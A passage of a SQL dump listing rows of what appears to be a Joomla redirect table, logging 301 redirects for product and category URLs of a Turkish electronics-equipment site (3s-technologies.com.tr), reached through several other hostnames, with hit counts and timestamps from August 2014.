00:00:00',301),(1742,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=en','','','',7,0,'2014-08-08 06:22:59','0000-00-00 00:00:00',301),(1743,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=tr','','','',16,0,'2014-08-08 06:24:37','0000-00-00 00:00:00',301),(1744,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=en','','','',4,0,'2014-08-08 06:27:31','0000-00-00 00:00:00',301),(1745,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=tr','','','',6,0,'2014-08-08 06:29:32','0000-00-00 00:00:00',301),(1746,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114&Itemid=124&lang=tr','','','',4,0,'2014-08-08 06:31:14','0000-00-00 00:00:00',301),(1747,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=113&Itemid=125&lang=tr','','','',2,0,'2014-08-08 06:33:25','0000-00-00 00:00:00',301),(1748,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=tr','','','',9,0,'2014-08-08 06:34:26','0000-00-00 00:00:00',301),(1749,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=99','','','',6,0,'2014-08-08 06:37:43','0000-00-00 00:00:00',301),(1750,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=tr','','','',5,0,'2014-08-08 06:39:21','0000-00-00 00:00:00',301),(1751,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=96&Itemid=107&lang=tr','','','',4,0,'2014-08-08 06:39:23','0000-00-00 00:00:00',301),(1752,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161','','','',7,0,'2014-08-08 06:41:00','0000-00-00 00:00:00',301),(1753,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=159&Itemid=162&lang=tr','','','',15,0,'2014-08-08 06:41:05','0000-00-00 00:00:00',301),(1754,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=155&Itemid=81&lang=tr','','','',3,0,'2014-08-08 06:44:25','0000-00-00 00:00:00',301),(1755,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=155&Itemid=81&lang=en','','','',5,0,'2014-08-08 06:46:13','0000-00-00 00:00:00',301),(1756,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=tr','','','',4,0,'2014-08-08 06:46:15','0000-00-00 00:00:00',301),(1757,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=55&Itemid=1&lang=tr','','','',3,0,'2014-08-08 06:51:10','0000-00-00 00:00:00',301),(1758,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=136&Itemid=138&lang=tr','','','',3,0,'2014-08-08 06:51:40','0000-00-00 00:00:00',301),(1759,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=55&Itemid=1&lang=en','','','',1,0,'2014-08-08 06:52:37','0000-00-00 00:00:00',301),(1760,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=73&Itemid=82&lang=en','','','',3,0,'2014-08-08 06:53:33','0000-00-00 00:00:00',301),(1761,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=73&Itemid=82&lang=tr','','','',5,0,'2014-08-08 06:54:01','0000-00-00 00:00:00',301),(1762,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=145&Itemid=147&lang=tr','','','',3,0,'2014-08-08 06:55:58','0000-00-00 00:00:00',301),(1763,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=86:mx350&catid=36:orta-hizli&Itemid=98&lang=en','','','',1,0,'2014-08-08 06:56:53','0000-00-00 00:00:00',301),(1764,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=tr','','','',3,0,'2014-08-08 06:58:42','0000-00-00 00:00:00',301),(1765,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=en','','','',3,0,'2014-08-08 06:58:57','0000-00-00 00:00:00',301),(1766,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154&lang=en','','','',1,0,'2014-08-08 06:58:59','0000-00-00 00:00:00',301),(1767,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=156&Itemid=157&lang=en','','','',3,0,'2014-08-08 07:00:05','0000-00-00 00:00:00',301),(1768,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=156&Itemid=157&lang=tr','','','',3,0,'2014-08-08 07:00:44','0000-00-00 00:00:00',301),(1769,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=en','','','',1,0,'2014-08-08 07:02:21','0000-00-00 00:00:00',301),(1770,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=tr','','','',3,0,'2014-08-08 07:02:36','0000-00-00 00:00:00',301),(1771,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=147&Itemid=146&lang=en','','','',2,0,'2014-08-08 07:02:50','0000-00-00 00:00:00',301),(1772,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=147&Itemid=146&lang=tr','','','',4,0,'2014-08-08 07:03:32','0000-00-00 00:00:00',301),(1773,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr','','','',3,0,'2014-08-08 07:03:46','0000-00-00 00:00:00',301),(1774,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=51&Itemid=92&lang=tr','','','',4,0,'2014-08-08 07:04:28','0000-00-00 00:00:00',301),(1775,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=51&Itemid=92&lang=en','','','',3,0,'2014-08-08 07:04:43','0000-00-00 00:00:00',301),(1776,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=en','','','',2,0,'2014-08-08 07:04:57','0000-00-00 00:00:00',301),(1777,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=tr','','','',1,0,'2014-08-08 07:05:25','0000-00-00 00:00:00',301),(1778,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=84:neoplace&catid=51:neo&Itemid=96&lang=en','','','',4,0,'2014-08-08 07:06:09','0000-00-00 00:00:00',301),(1779,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=53&Itemid=110&lang=en','','','',2,0,'2014-08-08 07:07:15','0000-00-00 00:00:00',301),(1780,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=53&Itemid=110&lang=tr','','','',3,0,'2014-08-08 07:07:35','0000-00-00 00:00:00',301),(1781,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=en','','','',1,0,'2014-08-08 07:08:18','0000-00-00 00:00:00',301),(1782,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=en','','','',8,0,'2014-08-08 07:10:43','0000-00-00 00:00:00',301),(1783,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=en','','','',4,0,'2014-08-08 07:12:43','0000-00-00 00:00:00',301),(1784,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=tr','','','',1,0,'2014-08-08 07:12:57','0000-00-00 00:00:00',301),(1785,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=tr','','','',2,0,'2014-08-08 07:13:53','0000-00-00 00:00:00',301),(1786,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=en','','','',1,0,'2014-08-08 07:14:07','0000-00-00 00:00:00',301),(1787,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=tr','','','',5,0,'2014-08-08 07:14:48','0000-00-00 00:00:00',301),(1788,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=49&Itemid=61&lang=tr','','','',1,0,'2014-08-08 07:15:06','0000-00-00 00:00:00',301),(1789,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=59&Itemid=155&lang=en','','','',1,0,'2014-08-08 07:17:12','0000-00-00 00:00:00',301),(1790,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118&lang=en','','','',3,0,'2014-08-08 07:17:20','0000-00-00 00:00:00',301),(1791,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=124&Itemid=130&lang=en','','','',4,0,'2014-08-08 07:17:39','0000-00-00 00:00:00',301),(1792,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=124&Itemid=130&lang=tr','','','',3,0,'2014-08-08 07:17:54','0000-00-00 00:00:00',301),(1793,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=tr','','','',4,0,'2014-08-08 07:18:59','0000-00-00 00:00:00',301),(1794,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=en','','','',3,0,'2014-08-08 07:19:13','0000-00-00 00:00:00',301),(1795,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=112&Itemid=123&lang=tr','','','',4,0,'2014-08-08 07:20:11','0000-00-00 00:00:00',301),(1796,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=112&Itemid=123&lang=en','','','',4,0,'2014-08-08 07:20:25','0000-00-00 00:00:00',301),(1797,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=44&Itemid=56&lang=tr','','','',1,0,'2014-08-08 07:20:54','0000-00-00 00:00:00',301),(1798,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=44&Itemid=56&lang=en','','','',3,0,'2014-08-08 07:21:08','0000-00-00 00:00:00',301),(1799,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=122&Itemid=129&lang=tr','','','',3,0,'2014-08-08 07:24:59','0000-00-00 00:00:00',301),(1800,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr&limitstart=5','','','',2,0,'2014-08-08 07:27:19','0000-00-00 00:00:00',301),(1801,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=en','','','',1,0,'2014-08-08 07:27:47','0000-00-00 00:00:00',301),(1802,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=en','','','',1,0,'2014-08-08 07:28:40','0000-00-00 00:00:00',301),(1803,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=41&Itemid=55&lang=tr','','','',3,0,'2014-08-08 07:29:33','0000-00-00 00:00:00',301),(1804,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=41&Itemid=55&lang=en','','','',1,0,'2014-08-08 07:29:47','0000-00-00 00:00:00',301),(1805,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=en','','','',4,0,'2014-08-08 07:30:07','0000-00-00 00:00:00',301),(1806,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=tr','','','',1,0,'2014-08-08 07:30:40','0000-00-00 00:00:00',301),(1807,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=en','','','',4,0,'2014-08-08 07:32:11','0000-00-00 00:00:00',301),(1808,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=90&Itemid=102&lang=tr','','','',1,0,'2014-08-08 07:33:37','0000-00-00 00:00:00',301),(1809,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=90&Itemid=102&lang=en','','','',2,0,'2014-08-08 07:33:52','0000-00-00 00:00:00',301),(1810,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=en','','','',1,0,'2014-08-08 07:34:44','0000-00-00 00:00:00',301),(1811,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=tr','','','',1,0,'2014-08-08 07:35:22','0000-00-00 00:00:00',301),(1812,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=95&Itemid=106&lang=tr','','','',1,0,'2014-08-08 07:35:36','0000-00-00 00:00:00',301),(1813,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=en','','','',1,0,'2014-08-08 07:38:40','0000-00-00 00:00:00',301),(1814,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=tr','','','',1,0,'2014-08-08 07:39:27','0000-00-00 00:00:00',301),(1815,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=153&Itemid=154&lang=tr','','','',3,0,'2014-08-08 07:42:22','0000-00-00 00:00:00',301),(1816,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=153&Itemid=154&lang=en','','','',5,0,'2014-08-08 07:42:59','0000-00-00 00:00:00',301),(1817,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=en','','','',1,0,'2014-08-08 07:44:37','0000-00-00 00:00:00',301),(1818,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158&lang=en','','','',3,0,'2014-08-08 07:46:49','0000-00-00 00:00:00',301),(1819,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=114&Itemid=124&lang=tr','','','',4,0,'2014-08-08 07:47:19','0000-00-00 00:00:00',301),(1820,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=tr','','','',2,0,'2014-08-08 07:47:33','0000-00-00 00:00:00',301),(1821,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=166&Itemid=144&lang=en','','','',1,0,'2014-08-08 07:48:12','0000-00-00 00:00:00',301),(1822,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=166&Itemid=144&lang=tr','','','',5,0,'2014-08-08 07:48:25','0000-00-00 00:00:00',301),(1823,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=97&Itemid=108&lang=en','','','',1,0,'2014-08-08 07:49:14','0000-00-00 00:00:00',301),(1824,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=97&Itemid=108&lang=tr','','','',1,0,'2014-08-08 07:49:27','0000-00-00 00:00:00',301),(1825,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=89&Itemid=101&lang=en','','','',1,0,'2014-08-08 07:49:41','0000-00-00 00:00:00',301),(1826,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=89&Itemid=101&lang=tr','','','',3,0,'2014-08-08 07:49:54','0000-00-00 00:00:00',301),(1827,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=tr','','','',1,0,'2014-08-08 07:50:33','0000-00-00 00:00:00',301),(1828,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=en','','','',4,0,'2014-08-08 07:50:46','0000-00-00 00:00:00',301),(1829,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=tr','','','',2,0,'2014-08-08 07:51:04','0000-00-00 00:00:00',301),(1830,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154&lang=en','','','',1,0,'2014-08-08 07:54:15','0000-00-00 00:00:00',301),(1831,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=en','','','',1,0,'2014-08-08 07:54:50','0000-00-00 00:00:00',301),(1832,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=tr','','','',1,0,'2014-08-08 07:58:07','0000-00-00 00:00:00',301),(1833,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en','','','',2,0,'2014-08-08 07:58:22','0000-00-00 00:00:00',301),(1834,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=en','','','',1,0,'2014-08-08 07:58:35','0000-00-00 00:00:00',301),(1835,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=tr','','','',2,0,'2014-08-08 07:58:54','0000-00-00 00:00:00',301),(1836,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=en','','','',5,0,'2014-08-08 08:03:00','0000-00-00 00:00:00',301),(1837,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=tr','','','',1,0,'2014-08-08 08:03:35','0000-00-00 00:00:00',301),(1838,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=36&Itemid=37&lang=tr','','','',2,0,'2014-08-08 08:04:22','0000-00-00 00:00:00',301),(1839,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=139&Itemid=141&lang=tr','','','',3,0,'2014-08-08 08:05:44','0000-00-00 00:00:00',301),(1840,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=139&Itemid=141&lang=en','','','',1,0,'2014-08-08 08:05:57','0000-00-00 00:00:00',301),(1841,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=84&Itemid=96&lang=en','','','',2,0,'2014-08-08 08:09:37','0000-00-00 00:00:00',301),(1842,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=tr','','','',1,0,'2014-08-08 08:10:05','0000-00-00 00:00:00',301),(1843,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164','','','',6,0,'2014-08-08 08:14:47','0000-00-00 00:00:00',301),(1844,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=en','','','',1,0,'2014-08-08 08:16:40','0000-00-00 00:00:00',301),(1845,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=en','','','',1,0,'2014-08-08 08:17:36','0000-00-00 00:00:00',301),(1846,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=tr','','','',3,0,'2014-08-08 08:17:49','0000-00-00 00:00:00',301),(1847,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=tr','','','',7,0,'2014-08-08 08:18:03','0000-00-00 00:00:00',301),(1848,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161&lang=en','','','',2,0,'2014-08-08 08:18:28','0000-00-00 00:00:00',301),(1849,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=56&Itemid=137&lang=en','','','',4,0,'2014-08-08 08:20:53','0000-00-00 00:00:00',301),(1850,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=56&Itemid=137&lang=tr','','','',1,0,'2014-08-08 08:21:09','0000-00-00 00:00:00',301),(1851,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161&lang=en','','','',5,0,'2014-08-08 08:21:50','0000-00-00 00:00:00',301),(1852,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=en','','','',4,0,'2014-08-08 08:21:56','0000-00-00 00:00:00',301),(1853,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=tr','','','',3,0,'2014-08-08 08:22:08','0000-00-00 00:00:00',301),(1854,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=en','','','',1,0,'2014-08-08 08:22:33','0000-00-00 00:00:00',301),(1855,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=tr','','','',4,0,'2014-08-08 08:23:19','0000-00-00 00:00:00',301),(1856,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=en','','','',3,0,'2014-08-08 08:23:32','0000-00-00 00:00:00',301),(1857,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118&lang=tr','','','',3,0,'2014-08-08 08:26:28','0000-00-00 00:00:00',301),(1858,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=en','','','',3,0,'2014-08-08 08:27:08','0000-00-00 00:00:00',301),(1859,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=43&Itemid=2&lang=tr','','','',2,0,'2014-08-08 08:27:40','0000-00-00 00:00:00',301),(1860,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=43&Itemid=2&lang=en','','','',1,0,'2014-08-08 08:28:03','0000-00-00 00:00:00',301),(1861,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=120&Itemid=116&lang=tr','','','',2,0,'2014-08-08 08:34:36','0000-00-00 00:00:00',301),(1862,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=en','','','',1,0,'2014-08-08 08:35:17','0000-00-00 00:00:00',301),(1863,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=tr','','','',2,0,'2014-08-08 08:37:18','0000-00-00 00:00:00',301),(1864,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102&lang=tr','','','',10,0,'2014-08-08 08:39:53','0000-00-00 00:00:00',301),(1865,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=159&Itemid=162&lang=en','','','',1,0,'2014-08-08 08:40:21','0000-00-00 00:00:00',301),(1866,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=107&Itemid=118&lang=tr','','','',1,0,'2014-08-08 08:41:02','0000-00-00 00:00:00',301),(1867,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=140&Itemid=142&lang=en','','','',1,0,'2014-08-08 08:41:52','0000-00-00 00:00:00',301),(1868,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=140&Itemid=142&lang=tr','','','',1,0,'2014-08-08 08:42:06','0000-00-00 00:00:00',301),(1869,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=tr','','','',3,0,'2014-08-08 08:42:15','0000-00-00 00:00:00',301),(1870,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=tr','','','',1,0,'2014-08-08 08:44:21','0000-00-00 00:00:00',301),(1871,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=138&Itemid=140&lang=en','','','',2,0,'2014-08-08 08:45:24','0000-00-00 00:00:00',301),(1872,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=138&Itemid=140&lang=tr','','','',6,0,'2014-08-08 08:45:45','0000-00-00 00:00:00',301),(1873,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=en','','','',4,0,'2014-08-08 08:46:09','0000-00-00 00:00:00',301),(1874,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=tr','','','',2,0,'2014-08-08 08:46:19','0000-00-00 00:00:00',301),(1875,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=164&Itemid=160&lang=en','','','',2,0,'2014-08-08 08:47:11','0000-00-00 00:00:00',301),(1876,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=tr','','','',3,0,'2014-08-08 08:50:09','0000-00-00 